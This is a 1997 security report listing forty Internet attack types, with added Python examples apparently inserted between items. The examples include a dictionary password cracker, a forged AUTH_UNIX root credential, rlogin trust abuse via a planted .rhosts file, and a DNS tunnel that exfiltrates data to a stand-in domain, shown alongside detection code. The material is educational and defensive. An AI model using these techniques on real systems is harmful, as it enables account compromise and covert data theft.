40 Internet Security Threats
David J. Stang, Ph.D.
With every passing day, we witness a huge increase in interest in Internet
access, sometimes called the "information highway". The public is now aware of
the Internet as a source of valuable information. We now have a glut of books on
how to use the Internet. There is a surge in the number of new Internet users,
new addresses, and sales of hardware and software to permit Internet access.
We are also witnessing a general awakening to an understanding that there are
security problems that might result when connecting to the Internet. While the
public seems aware that such problems exist, very few people have any detailed
knowledge of what the problems are. Many now think they should buy a firewall
to prevent such problems. They think that firewalls are generic things, like
fire extinguishers, that probably all are about equally effective, and that with a
firewall installed, they will have dealt with the Internet security problems they
have heard of.
Users are headed for trouble if they continue to believe this. There is a wide
variety of problems, and most firewalls stop only a fraction of them. Firewalls
differ so widely in what they can do that they hardly deserve to be grouped
together under the same name.
In this technical report, we will not tackle the entire problem of Internet
security. Rather, we will focus on a manageable set of issues:
What are some of the security problems that can arise with an Internet connection?
What are the kinds of technology available that might help with such problems?
Your internal network is potentially vulnerable to a wide variety of attacks
from the outside. Here are some examples, each of which you might ask your
firewall to defend you against. Most of the attacks are described in more detail in
Cheswick & Bellovin. We use published descriptions of attacks and provide
fairly little information about each, in an effort to minimize the "training" that
this report might provide to attackers. Our intent is to show the wide array of
mechanisms by which an attacker can get into your kitchen, living room, and
bedroom. Here is a short list of just 40 vulnerabilities:
1. Attacks via password guessing. Guessable passwords (such as
"service" as the password for an account named "field", or the default
passwords provided at installation time) can defeat nearly any system,
and are the most common means by which a system is penetrated. A
proper firewall should establish the non-guessability of all passwords
used by the system it is protecting. It should also provide additional
authentication mechanisms, such as authenticating both the machine
(by Ethernet address, for instance) and the user. It should also limit the
number of login attempts, to prevent unlimited guessing.
2. Brute force password guessing. Password guessing attacks on the
file of encrypted (hashed) passwords (/etc/passwd) will normally succeed
when the attacker uses a cracking tool such as CRACK and the file has a
sufficient number of names in it. Such attacks can recover as many as
25% of the passwords in the file, some of which will also be valid on
other systems. A good firewall protects the password file, and
prevents its transmission or alteration.
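The attack of items 1 and 2 in working form, as an added example (not code from the report or from CRACK). It runs a dictionary attack over a constructed sample password file; the hash scheme, "salt$hex" with hex = SHA-256(salt + password), is an assumption chosen so the example runs on any Python (the crypt(3) module is no longer shipped) and stands in for the DES-based crypt of the period. The guesses derived from the account name and GECOS field are what makes "service" for account "field" fall immediately.

```python
import hashlib
from typing import Dict, List


def hash_password(salt: str, password: str) -> str:
    """Assumed hash format: salt, '$', hex of SHA-256(salt + password)."""
    return salt + "$" + hashlib.sha256((salt + password).encode()).hexdigest()


def verify(field: str, guess: str) -> bool:
    salt = field.split("$", 1)[0]
    return hash_password(salt, guess) == field


# Constructed sample password file (not taken from any real system).
SAMPLE_PASSWD = "\n".join([
    "root:%s:0:0:Root:/:/bin/sh" % hash_password("a1", "toor"),
    "field:%s:10:10:Field Service:/usr/field:/bin/sh" % hash_password("b2", "service"),
    "alice:%s:1001:100:Alice Jones:/home/alice:/bin/sh" % hash_password("c3", "k9$Lw!x2Qp"),
    "bob:%s:1002:100:Bob Smith:/home/bob:/bin/sh" % hash_password("d4", "bob"),
    "guest:%s:1003:100:Guest Account:/home/guest:/bin/sh" % hash_password("e5", "guest"),
])

# A tiny dictionary; real attacks use tens of thousands of words.
WORDLIST = ["password", "service", "toor", "letmein", "wheel", "secret"]


def derived_guesses(user: str, gecos: str) -> List[str]:
    """Guesses CRACK-style tools derive from the entry itself: the account
    name, its reverse, the name with a digit appended, and the words of the
    GECOS (full name / comment) field."""
    guesses = [user, user[::-1], user + "1"]
    guesses += [w.lower() for w in gecos.replace(",", " ").split()]
    return guesses


def crack(passwd_text: str, wordlist: List[str]) -> Dict[str, str]:
    """Return {user: recovered password} for every entry some guess matches."""
    found: Dict[str, str] = {}
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        user, field, _uid, _gid, gecos = line.split(":")[:5]
        for guess in derived_guesses(user, gecos) + wordlist:
            if verify(field, guess):
                found[user] = guess
                break
    return found


def cracked_fraction(passwd_text: str, wordlist: List[str]) -> float:
    entries = [l for l in passwd_text.splitlines() if l.strip()]
    return len(crack(passwd_text, wordlist)) / len(entries)


if __name__ == "__main__":
    for user, pw in crack(SAMPLE_PASSWD, WORDLIST).items():
        print("%-8s %s" % (user, pw))
    print("cracked %.0f%% of accounts" % (100 * cracked_fraction(SAMPLE_PASSWD, WORDLIST)))
```

Only the account with a password unrelated to its own entry and to the dictionary survives; a password file that leaves the host, by NIS, tftp, or anonymous ftp (items 28, 32 and 34 below), hands the attacker unlimited offline attempts, which is why the login-attempt limit of item 1 does not help once the file is lost.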
3. Tapping terminal sessions. Tapping terminal sessions is a
technique in which the attacker merely monitors an active user,
capturing their keystrokes and looking for a login to another system.
Such attacks are possible with the default configuration of even
"secure" versions of UNIX, such as OSF/1.
4. Keystroke capture of passwords via TSR. Keystroke capture of
passwords via a TSR (terminate-and-stay-resident program) can be done
with any number of hacker tools such as THIEF or GETIT, or even Borland's
SUPERKEY. With this attack, the attacker will usually need later access
to the local drive to pick up the file containing the captured keystrokes.
5. Sequence number attacks. A sequence number attack occurs when an
attacker predicts the target's choice of initial TCP sequence number,
places the address of a trusted host in the IP source address field, and
then completes the handshake blind against any protocol that uses the
source address for authentication (such as the r commands in UNIX). A
firewall might be expected to prevent such an attack by a more secure
authentication of the source host.
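Why the prediction works, as an added example (not code from the report). The "classic" generator below follows the 4.4BSD-era rule that the sequence number counter advances by a fixed 64,000 on each new connection; the clock-driven 128,000-per-second component is left out by assuming both connections fall within the same tick, a simplification assumed for the example. No packets are sent; the two generators are simulated in memory.

```python
import random


class ClassicISN:
    """4.4BSD-era generator: +64,000 per connection (clock term omitted)."""

    def __init__(self, start: int = 0):
        self.counter = start & 0xFFFFFFFF

    def next_isn(self) -> int:
        self.counter = (self.counter + 64000) & 0xFFFFFFFF
        return self.counter


class RandomISN:
    """Generator that picks every initial sequence number at random."""

    def __init__(self, rng: random.Random):
        self.rng = rng

    def next_isn(self) -> int:
        return self.rng.getrandbits(32)


def random_server(seed: int) -> RandomISN:
    # Fixed seed so the demonstration is repeatable.
    return RandomISN(random.Random(seed))


def predict_next(observed: int) -> int:
    """The attacker's model of the server: last ISN plus 64,000."""
    return (observed + 64000) & 0xFFFFFFFF


def blind_spoof_succeeds(server) -> bool:
    """One attempt at the sequence number attack.

    1. The attacker opens an ordinary connection and records the ISN the
       server sends (legitimate traffic the attacker can see).
    2. The attacker sends a SYN whose IP source address is a trusted host.
    3. The server's SYN/ACK goes to the trusted host, so the attacker never
       sees the ISN in it and must supply the ACK number by guessing.
    The forged connection is established only if the guess is right."""
    observed = server.next_isn()
    guess = predict_next(observed)
    unseen = server.next_isn()
    return ((guess + 1) & 0xFFFFFFFF) == ((unseen + 1) & 0xFFFFFFFF)


def success_rate(make_server, trials: int) -> float:
    return sum(blind_spoof_succeeds(make_server()) for _ in range(trials)) / trials


if __name__ == "__main__":
    print("classic ISN:", success_rate(lambda: ClassicISN(12345), 100))
    print("random ISN: ", success_rate(lambda: random_server(1), 100))
```

Against the classic generator every attempt succeeds; against a random one the attacker has one chance in 2^32 per attempt. In practice the attacker also has to keep the trusted host from answering the unexpected SYN/ACK (by flooding it, for instance), which the simulation does not model.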
6. Spoofing UDP packets. Spoofing UDP packets is easy for an attacker
if your applications use the User Datagram Protocol to transmit
information. UDP does not use handshaking or sequence numbers, and
delivers all packets for a given port to the same process, regardless of
source address or port number. A firewall might be expected to
independently verify the source of a UDP packet before processing it,
even if the source appears to be internal to the network.
7. Tearing down connections with ICMP. The Internet Control Message
Protocol (ICMP) is the mechanism by which hosts are informed of better
routes and of network problems; some of its messages cause a host to
terminate connections when network problems arise. Older implementations
ignore the connection-specific information carried in an ICMP message,
and may act on all connections between a pair of hosts rather than on
the one the message refers to. Hacking tools that tear down connections
using this technique are available to the underground.
8. Redirecting connections with ICMP. ICMP Redirect messages can be
forged to alter routing, sending traffic for a destination by way of a
new host. Many routers (and hosts) will act on such instructions, though
they should be configured to do no such thing! A proper firewall design
would accept a redirect only when its own trusted router provides it.
9. Loose Source Route option attacks. Loose Source Route option
attacks require that the attacker initiate a TCP connection, specifying
an explicit path to the destination. Seeing that source routing is in
use, the destination sends its replies along the reverse of that path
(source becomes destination), conforming to RFC 1122. This permits an
attacker to impersonate a trusted machine, since replies addressed to
the trusted host are routed back through the attacker. Independent
authentication by a proper firewall can defeat this approach.
10. Bogus Routing Information Protocol attacks insert forged RIP
packets into a network. If the attacker advertises a shorter path to
the target than the legitimate source does, traffic is diverted to the
attacker. In some implementations of RIP there is no authentication
field and no dialog between pairs of hosts to establish authenticity. In
such a case, the attacker can provide the host with a host-specific
route, making the attack more difficult to detect.
11. Zone transfer attacks. The Domain Name System (DNS) is a
distributed database that maps between host names and IP addresses. TCP
queries by backup (secondary) servers can produce zone transfers, in
which a full copy of a portion of the name space is sent, so that the
backup server can do its job. In a zone transfer attack, attackers make
similar requests of the DNS, obtaining a list of potential target hosts
and IP addresses.
12. Inverse mapping tree attacks. In many systems, DNS permits
subtrees to be stored on other servers. Because DNS maintains two
trees, one mapping host names to addresses and the other mapping
addresses to names, an attacker who controls the inverse (address-to-name)
records for their own address can set them to show the name of a
trusted host. Then, by using rlogin, the attacker may be able to
convince your machine that it is a trusted host. A firewall might be
able to prevent such an inverse mapping tree attack if it protected the
DNS, or performed more thorough authentication by checking that the
forward lookup of the name returns the caller's IP address.
13. DNS cache attacks. In all but the most recent versions of DNS, it is
possible to pre-contaminate the target's cache of DNS responses, then
initiate the call. When the target consults its cache of supposedly valid
responses, it finds a name match and permits the attack. A firewall must
use both name-based and address-based authentication if it is to be trusted.
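The cross-check that defeats the inverse mapping attack of item 12, and its limit against the cache attack of item 13, as an added example (not code from the report). The zone data is constructed: the attacker is assumed to control the reverse zone for their own address block (203.0.113.0/24 here), as anyone does for addresses they are delegated, and has placed a PTR record in it naming a host the target trusts. Lookups are simulated with tables rather than real DNS queries.

```python
from typing import Dict, List, Set

# Constructed zone data (RFC 5737 documentation addresses).
FORWARD: Dict[str, List[str]] = {          # name -> A records
    "trusted.example.com.": ["192.0.2.10"],
    "attacker.example.net.": ["203.0.113.5"],
}
REVERSE: Dict[str, List[str]] = {          # address -> PTR records
    "192.0.2.10": ["trusted.example.com."],
    "203.0.113.5": ["trusted.example.com."],  # forged inverse record
}


def ptr_lookup(addr: str) -> List[str]:
    """Address -> names; stands in for a PTR query under in-addr.arpa."""
    return REVERSE.get(addr, [])


def a_lookup(name: str) -> List[str]:
    """Name -> addresses; stands in for an A query."""
    return FORWARD.get(name, [])


def name_only_check(addr: str, trusted: Set[str]) -> bool:
    """What a naive r-command does: trust the caller if the name its
    address maps to appears in hosts.equiv or .rhosts."""
    return any(name in trusted for name in ptr_lookup(addr))


def double_reverse_check(addr: str, trusted: Set[str]) -> bool:
    """Trust the caller only if the inverse name is trusted AND the forward
    lookup of that name leads back to the caller's own address."""
    for name in ptr_lookup(addr):
        if name in trusted and addr in a_lookup(name):
            return True
    return False


if __name__ == "__main__":
    trusted = {"trusted.example.com."}
    for addr in ("192.0.2.10", "203.0.113.5"):
        print(addr, "name-only:", name_only_check(addr, trusted),
              "double-reverse:", double_reverse_check(addr, trusted))
```

The double-reverse check stops the attacker of item 12, who controls only the reverse zone. It does not stop the attacker of item 13, who has planted a forged A record for trusted.example.com in the target's cache, because then the forward lookup lies as well; that is the reason the report asks for address-based authentication alongside the name-based kind.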
14. DNS resolver attacks. DNS resolver attacks exploit a weakness in
resolvers which, for the user's convenience, are willing to accept a
destination for which the match on the domain name is incomplete (an
unqualified or partially qualified name completed from a search list).
Thus a domain with a name in common with part of the desired destination
name might be able to intercept traffic intended for another destination.
15. SMTP overload attacks. The Simple Mail Transfer Protocol
(SMTP) provides a simple set of rules for transporting 7-bit
messages. The protocol can be imitated easily, and because there is no
authentication, messages can be entered manually by an attacker.
Because an attacker can specify any source for the mail, it is
possible to overload the system with bogus messages, creating a denial
of service. In such an attack the mail system loses functionality, even
if the host does not collapse under the weight of the bogus incoming
messages.
16. Alias expansion. SMTP permits aliases to be used when transmitting
mail. But commands such as VRFY may translate mail aliases to login
names, and EXPN expands mailing-list aliases. A firewall should ensure
that expansion of aliases to names is done only inside the organization,
to preserve the confidentiality of those who use the system.
17. sendmail attacks. sendmail is the most common means by which
SMTP is implemented, and with thousands of lines of code, there are
many bugs. Root is no place to run such a documentedly dangerous
program! sendmail need not run as root except to perform local delivery,
which a gateway machine need not do at all. Alternatives to sendmail are
available, including potentially safer front-ends to it.
18. MIME header attacks. A mailer on a machine receiving mail encoded
with MIME (Multipurpose Internet Mail Extensions) might be expected to
carry out instructions in the headers of the MIME message. Such
instructions, if not carefully evaluated before execution, can overwrite
.rhosts in the current directory and perform other forms of mischief.
19. Executables attached to mail. If the mail system can be entered by
an attacker who can forge a message, then the attacker won't have
difficulty attaching a program to the mail. The program can be designed
to do anything the attacker wishes, and the Trojan is likely to succeed
if it appears to do something useful for the recipient. The Trojan, for
instance, might seek to capture passwords as a TSR, or might merely
contain a virus not detected by the recipient's virus scanner. Sometimes
the Trojan is a "dropper", a program containing a virus. The program and
virus are usually encrypted, to prevent a scanner from detecting the
virus; when the program is run, the virus is released to infect files, or
is placed in a boot sector, where it will execute with the next boot.
Trojans and droppers do not require a deliberate attack, of course: they
can be attached to E-mail by well-meaning senders who are unaware of the
hidden contents of the program they forward.
20. Attacks via corrupted telnet. telnet provides a user with terminal
access. On an insecure system, the telnet program can be replaced by an
attacker with one that captures the user name, password, or even the
entire terminal session. Alternatively, if the attacker is not interested
in what you are doing, but rather wishes to have the access offered by
your account, the attacker's telnet replacement can simply keep the
connection open after you think you've logged out.
21. Tapping the communications link. When any portion of a
communications link is tapped, unencrypted passwords cannot be
trusted. Often the easiest place to attack a communications link is a tap
on its backbone.
22. NTP attacks. When an authentication service is time-sensitive, so
that a different authentication value is used at each different time, an
attacker has an opportunity to capture the value used for authentication
along with the time it was used, then instruct the host via the Network
Time Protocol (NTP) to set its clock back to the time at which the
captured authenticator was valid, and simply play the captured
authenticator back. Such NTP attacks are not absolutely prevented by the
latest versions of NTP.
23. finger attacks. The finger protocol provides information on users
that is quite useful to attackers, including their name, electronic mail
address, when the account was last used, where the user last connected
from, idle periods, unread mail, etc. Attackers appreciate finger for its
help in identifying relatively unused accounts and for the match between
names and mail addresses, which is handy for password guessing. finger is
a dangerous service, far less secure than whois.
24. Forging UNIX authentication fields in RPC headers. RPC
(Sun's Remote Procedure Call) is a protocol that provides a designer
with the means of creating a network service which can reach out and
make subroutine calls to remote servers. Every RPC message has a
header which can include authentication information. The information
might be "null", for anonymous services, or might include "UNIX
authentication" information: the supposed numeric user id and group id
of the caller and the name of the calling machine. All of the information
in these fields can be readily forged by an attacker, and the RPC request
can ask for essentially any service available on the host.
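What "UNIX authentication" in an RPC header amounts to on the wire, as an added example (not code from the report or from any RPC implementation). The encoding follows the XDR layout of AUTH_UNIX (also called AUTH_SYS) credentials: a stamp, the caller's machine name, uid, gid and a list of supplementary gids, wrapped in an opaque_auth with flavor 1. The example builds a credential claiming uid 0 from a trusted machine and parses it back as a server would; no server is contacted, and the machine name is constructed.

```python
import struct
from typing import Dict, List

AUTH_UNIX = 1  # flavor number of AUTH_UNIX / AUTH_SYS credentials


def _xdr_u32(n: int) -> bytes:
    return struct.pack(">I", n)


def _xdr_opaque(s: bytes) -> bytes:
    """XDR variable-length opaque: 4-byte length, the bytes, padding to 4."""
    return _xdr_u32(len(s)) + s + b"\0" * ((-len(s)) % 4)


def auth_unix_credential(stamp: int, machine: str, uid: int, gid: int,
                         gids: List[int]) -> bytes:
    """Build the opaque_auth a client places in its call header. Every
    field is chosen by the caller; nothing in it is signed or verified."""
    body = _xdr_u32(stamp) + _xdr_opaque(machine.encode())
    body += _xdr_u32(uid) + _xdr_u32(gid)
    body += _xdr_u32(len(gids)) + b"".join(_xdr_u32(g) for g in gids)
    return _xdr_u32(AUTH_UNIX) + _xdr_opaque(body)


def parse_opaque_auth(data: bytes) -> Dict[str, object]:
    """Decode an opaque_auth carrying AUTH_UNIX, as a server does."""
    flavor, length = struct.unpack(">II", data[:8])
    if flavor != AUTH_UNIX:
        raise ValueError("not an AUTH_UNIX credential")
    body = data[8:8 + length]
    pos = 0

    def u32() -> int:
        nonlocal pos
        value = struct.unpack(">I", body[pos:pos + 4])[0]
        pos += 4
        return value

    stamp = u32()
    mlen = u32()
    machine = body[pos:pos + mlen].decode()
    pos += mlen + ((-mlen) % 4)
    uid, gid = u32(), u32()
    gids = [u32() for _ in range(u32())]
    return {"stamp": stamp, "machine": machine, "uid": uid, "gid": gid, "gids": gids}


def naive_is_privileged(cred: bytes) -> bool:
    """All a server relying on AUTH_UNIX can do: believe the uid field."""
    return parse_opaque_auth(cred)["uid"] == 0


if __name__ == "__main__":
    # Constructed credential: the attacker simply claims to be root on a trusted host.
    cred = auth_unix_credential(0x12345678, "trusted.example.com", 0, 0, [0, 1])
    print(cred.hex())
    print(parse_opaque_auth(cred), "privileged:", naive_is_privileged(cred))
```

Because the server has nothing but these self-asserted fields to go on, services such as NFS and NIS that accept AUTH_UNIX (items 28 and 31 below) can only be protected by restricting which hosts may reach them at all, or by moving to an authenticated flavor such as Secure RPC or Kerberos.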
25. Portmapper denial of service attacks. Portmapper helps connect
RPC clients and servers, and uses RPC for its work. One call supported
by portmapper is to unregister a service. Because portmapper does not
do much to authenticate such a request, portmapper denial of service
attacks are straightforward.
26. Portmapper reports to attackers via rpcinfo. Portmapper will
also provide information on each service the server is running,
including its protocol (e.g., UDP or TCP), its port number, and its
version number. An attacker's work is easier after they obtain this
information with rpcinfo.
27. Attacks using portmapper to hide the source location. Use of RPC
normally requires a round trip of messages to determine the real port
number of the client (the source, or attacker). To save this trip,
portmapper permits the source to ask it to forward the request to the
target server, carrying portmapper's own return address rather than the
actual source's. This ability makes requests from outside callers
indistinguishable from legitimate local ones. While some versions of
portmapper can do their own filtering, many do not.
28. NIS attacks which obtain the password file, host address
table, or public and private key databases. Network
Information Service (NIS, formerly known as YP or Yellow Pages) is a
service that distributes many important databases from a central
server to its clients. Such databases include the password file, the host
address table, and the public and private key databases used for Secure
RPC. This attack instructs NIS to transfer one or more of these key
files to the attacker.
29. Attacks impersonating NIS backup servers. NIS clients can be
told to use a different NIS server, should theirs go down; the
replacement server can be fraudulent, and supply false /etc/passwd
entries, false host addresses, etc.
30. RPC attacks on the NIS shadow password file. A shadow
password file is a protected copy of the password file which holds the
actual encrypted (hashed) passwords, readable only by privileged
processes. An attacker is unlikely to be able to read this file directly,
but can make repeated requests for RPC services using a variety of
passwords. Applications check this file for the password, and report
back to the attacker whether the password is valid. RPC does not log
flurries of such requests.
31. Attacks using NFS root file handles. To mount a volume for a
client, the RPC mount daemon on a server running NFS (Network File
System) asks the client for its name and the requested file system,
examines an administrator-supplied export list, and, if the client is on
the list, sends the client the file handle for the root directory of that
file system. The client keeps this file handle, and uses it in subsequent
requests. If the client records the handle for later use, it has
permanent access to that root: root file handles can be shared, and once
a client has been given one, there is no mechanism for later taking it
back. Considering the many problems that can occur in managing NFS,
secure alternatives such as the Andrew File System (AFS) should be
considered. AFS uses Kerberos for its authentication and provides a
single scalable, global, location-independent file system. Files can
reside anywhere in the network, with caching occurring transparently.
32. Attacks via tftp. The Trivial File Transfer Protocol (tftp) is a
UDP-based file transfer mechanism which does not support authentication
at all. If tftp is not restricted to just one or two directories, then
attacks on the password file are simple.
33. Attacks using anonymous ftp. FTP (File Transfer Protocol) is a
program and file distribution system that rivals e-mail for importance
on the Internet. Anonymous ftp permits any caller to transfer files
from a restricted area of the host without providing any further
authorization. If ftp is set up so that a file or directory in the
anonymous ftp area is writable by or owned by the ftp login, then an
attacker can use ftp to write a file named .rhosts into ftp's home
directory, then use that file to authorize an rsh connection to the target
machine as ftp. From there, the attacker proceeds to transfer files.
34. Anonymous ftp captures of /etc/passwd. If you happen to leave the
/etc/passwd file in an area reachable by anonymous ftp, assume a visitor
will help themselves to a copy.
35. Undesirable files placed in the publicly writable
anonymous ftp directory. If you have an area where anonymous ftp
callers can place files, you should assume that this area will sooner or
later hold copies of pirated, pornographic, slanderous, or
virus-infected files. Such files may be placed there for your own
amusement, for the "benefit" of those within your organization, or
simply for others, witting or unwitting, to come and collect.
36. Denial of service by filling the publicly writable
anonymous ftp area. If a caller can place files on your system
anonymously, it may be a matter of time before some caller places an
expanding file there that fills the available space. Such a project will
potentially disable any audit trail, slow other processes (or bring down
the system), and, at a minimum, deny additional callers write access to
the area.
37. Anonymous ftp attacks by replacement of commands within
the ftp area. Any program such as ls which resides in the ftp area can
potentially be replaced by an attacker, subsequently resulting in
unexpected and undesired results.
38. Attacks with rlogin. rlogin permits login to a remote machine
without a password if a few simple conditions are met: the caller must
be listed in the destination's lists of trusted callers (such as
/etc/hosts.equiv or $HOME/.rhosts), the caller must come from a
privileged TCP port, and usually the caller's name must correspond to
the caller's IP address. Both users and attackers like rlogin. Users like
it because it does not require password entry, permits them to reach
other remote machines by simply adding them to their personal .rhosts
file, and seems to work fine. Attackers like it because all they need to
do is drop a file listing them as authorized into /etc/hosts.equiv or
into a home directory such as /usr/spool/uucppublic, /usr/ftp, etc.
After they have gotten in with rlogin, they can capture lists of other
trusting machines from /etc/hosts.equiv and other files, and from there
explore many other machines.
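The trust decision that items 33 and 38 abuse, as an added example (not code from the report or from any rlogind). It reconstructs the hosts.equiv/.rhosts rules stated in the text: the caller must come from a privileged port, a bare "host" line trusts a remote user of the same name, a "host user" line trusts that user, "+" is a wildcard, and /etc/hosts.equiv is never consulted for root. The sample files are constructed; real ruserok() also handles netgroups and "-" negative entries, which this example omits.

```python
from typing import List, Optional, Tuple

Entry = Tuple[str, Optional[str]]   # (host pattern, user pattern or None)


def parse_trust_file(text: str) -> List[Entry]:
    """Each line is 'host' or 'host user'; '+' matches anything; '#' starts a comment."""
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        entries.append((parts[0], parts[1] if len(parts) > 1 else None))
    return entries


def _matches(pattern: str, value: str) -> bool:
    return pattern == "+" or pattern.lower() == value.lower()


def _entry_allows(entry: Entry, remote_host: str, remote_user: str,
                  same_user: bool) -> bool:
    host, user = entry
    if not _matches(host, remote_host):
        return False
    # 'host' alone trusts only a remote user with the same name as the
    # local account; 'host user' trusts that remote user explicitly.
    return same_user if user is None else _matches(user, remote_user)


def ruserok(hosts_equiv: str, rhosts: str, remote_host: str, remote_user: str,
            local_user: str, source_port: int) -> bool:
    """Simplified rlogin/rsh decision: may remote_user@remote_host log in
    as local_user without a password?"""
    if source_port >= 1024:
        # A non-privileged source port means the client was not root on
        # its own host, so its claimed user name is not even self-asserted by root.
        return False
    same_user = remote_user == local_user
    if local_user != "root":          # hosts.equiv never applies to root
        for entry in parse_trust_file(hosts_equiv):
            if _entry_allows(entry, remote_host, remote_user, same_user):
                return True
    for entry in parse_trust_file(rhosts):
        if _entry_allows(entry, remote_host, remote_user, same_user):
            return True
    return False


# Constructed sample files.
HOSTS_EQUIV = "trusted.example.com\n# partner site\npartner.example.org\n"
RHOSTS_PLANTED = "evil.example.net attacker\n"   # dropped into ~ftp via writable ftp area
HOSTS_EQUIV_OPEN = "+ +\n"                        # a classic misconfiguration

if __name__ == "__main__":
    print("legit  :", ruserok(HOSTS_EQUIV, "", "trusted.example.com", "alice", "alice", 1022))
    print("planted:", ruserok(HOSTS_EQUIV, RHOSTS_PLANTED, "evil.example.net", "attacker", "ftp", 1022))
    print("+ +    :", ruserok(HOSTS_EQUIV_OPEN, "", "anything.invalid", "mallory", "alice", 1022))
```

Note that every one of these checks rests on the remote host name, which is derived from the source IP address (spoofable, item 5) through the inverse DNS tree (forgeable, item 12); the privileged-port rule only proves that the caller is root on a machine you have chosen to believe.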
39. Attacks on X11 servers. X11 is the most popular windowing system on
the Internet. In X11 the user's display is the server, and applications
are clients that interact with it. A client is able to track
keystrokes, capture screens, simulate keystrokes, etc. The main
protection of most X11 servers is that they only permit certain
machines to make requests of them. Users are typically not notified of
denied access requests, nor can the server verify what process is
using it. Attackers anywhere on the Internet can find and control all
unprotected X11 servers.
40. Tunneling and encapsulation. If you run a firewall that only
permits certain protocols, other protocols will be able to pass through
if they are encapsulated within approved protocols, unless you examine
the contents of each packet before it is permitted to pass through the
firewall. Once a tunnel has been constructed between a "mole" inside
your organization and a party outside your organization, bidirectional
tunnel traffic will not be impaired by your firewall.
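A concrete tunnel of the kind item 40 describes, and the content inspection that catches it, as an added example (not code from the report). DNS is almost always an approved protocol, so the "mole" encodes data as base32 labels of queries under a domain the outside party serves; any resolver forwards them. The tunnel domain, payload and benign query names are constructed; the thresholds in the detector are assumptions a practitioner would tune to their own traffic.

```python
import base64
import math
from collections import Counter
from typing import Dict, List

TUNNEL_DOMAIN = "t.example.net"   # assumed to be served by the outside party
LABEL_LEN = 50                    # a DNS label may hold at most 63 octets


def encode_queries(payload: bytes) -> List[str]:
    """Split the payload into base32 chunks, one query name per chunk:
    '<seq>.<chunk>.<tunnel domain>'."""
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    chunks = [b32[i:i + LABEL_LEN] for i in range(0, len(b32), LABEL_LEN)]
    return ["%d.%s.%s" % (i, c, TUNNEL_DOMAIN) for i, c in enumerate(chunks)]


def decode_queries(queries: List[str]) -> bytes:
    """Reassemble on the outside party's name server; order-independent."""
    chunks: Dict[int, str] = {}
    for q in queries:
        seq, chunk = q.split(".")[:2]
        chunks[int(seq)] = chunk
    b32 = "".join(chunks[i] for i in sorted(chunks)).upper()
    b32 += "=" * ((-len(b32)) % 8)          # restore base32 padding
    return base64.b32decode(b32)


def label_entropy(label: str) -> float:
    """Shannon entropy of the characters in a label, in bits."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def is_suspicious(qname: str, max_label: int = 30, min_entropy: float = 3.5) -> bool:
    """Per-query inspection: host names are short and low-entropy, tunnel
    labels are long and look random. The registered domain is ignored."""
    labels = qname.rstrip(".").split(".")[:-2]
    return any(len(l) >= max_label or (len(l) >= 12 and label_entropy(l) >= min_entropy)
               for l in labels)


def registered_domain(qname: str) -> str:
    return ".".join(qname.rstrip(".").split(".")[-2:])


def names_per_domain(queries: List[str]) -> Counter:
    """Aggregate signal: a tunnel produces a fresh name for every packet,
    so one domain accumulates far more distinct names than any real site."""
    return Counter(registered_domain(q) for q in set(queries))


# Constructed inputs.
PAYLOAD = b"quarterly numbers: revenue up 12%, headcount down 3 (do not forward)"
NORMAL_QUERIES = ["www.example.com", "mail.example.com", "ftp.example.com", "www.example.com"]

if __name__ == "__main__":
    tunnel = encode_queries(PAYLOAD)
    for q in tunnel:
        print(q, "suspicious:", is_suspicious(q))
    print("decoded:", decode_queries(tunnel))
    print("distinct names per domain:", names_per_domain(tunnel + NORMAL_QUERIES))
```

The per-query test misses a short final chunk, which is why the distinct-names count per domain is kept as a second signal; a firewall that forwards DNS without looking at it has neither.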
Last Revised Wednesday April 16, 1997.
© 1997 Seven Locks Software, Inc. All rights reserved.